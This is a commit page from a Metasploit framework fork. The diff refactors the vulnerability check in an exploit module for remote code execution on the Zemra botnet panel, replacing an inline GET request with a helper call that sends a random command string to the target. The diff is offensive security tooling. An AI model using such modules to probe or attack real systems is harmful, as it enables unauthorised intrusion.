dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Update zemra_panel_rce.rb 

called http_send_command right away :)
This commit is contained in:
JT 2015-10-01 23:39:36 +08:00
parent 66560d5339
commit 5c5f3a4e7f
1 changed files with 1 additions and 9 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

10
modules/exploits/multi/http/zemra_panel_rce.rb
View File

@ -59,15 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote
def check def check
txt = Rex::Text.rand_text_alpha(8) txt = Rex::Text.rand_text_alpha(8)
uri = normalize_uri(target_uri.path.to_s) http_send_command(txt)
res = send_request_cgi({
'method' => 'GET',
'uri' => uri,
'vars_get' =>
{
'cmd' => txt
}
})
if res && res.body =~ /cmd/ if res && res.body =~ /cmd/
return Exploit::CheckCode::Vulnerable return Exploit::CheckCode::Vulnerable
end end